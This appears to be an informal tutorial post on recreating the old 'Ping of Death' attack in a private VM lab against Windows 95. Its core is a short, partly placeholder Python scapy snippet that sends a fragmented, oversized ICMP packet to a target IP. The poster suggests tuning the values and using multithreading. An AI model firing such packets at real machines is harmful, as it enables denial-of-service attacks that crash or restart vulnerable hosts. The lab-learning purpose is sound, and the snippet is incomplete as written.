Disclaimer: This attack is too deprecated it might have been a prime in my grandfather's middle age crisis days.
For the sake of learning purposes, lets pretend we are still in the 90's and reconstruct this.
For testing purposes, setup two machines in a private network, take it to the VM to save yourself from the huddles of networking. I leave the VM networking as homework for you.
I would advise one machine to have you favorite OS to ping from and the other having something like
Windows 95.
I don't know if that ISO is patched but try it out anyways.
Your default ping utility on your system might not allow you to enter an arbitrary amount of bytes to send so i advise you go the scapy way since we are doing python.
NOTICE: I am typing this from my browser, fuck you if it does go through
import argparse
from scapy.all import send, fragment, IP, ICMP
#implement argparse logic to get URL but most preferably IP
#if IP, validate that is IP with regex or w/e logic you think of
#if URL, i suggest get its or one of its IP Address
ip_address = #validated IP from above
#scappy magic
send(fragment(IP(dst=ip_address) / ICMP() / ("X"*60000)))
I suggest you play around with those values, remember the multithreading advice from prior and you most probably will not find a vulnerable machine in this time and age unless you set it up.
If the attack doesn't crash the machine or restart it, get MSDOS.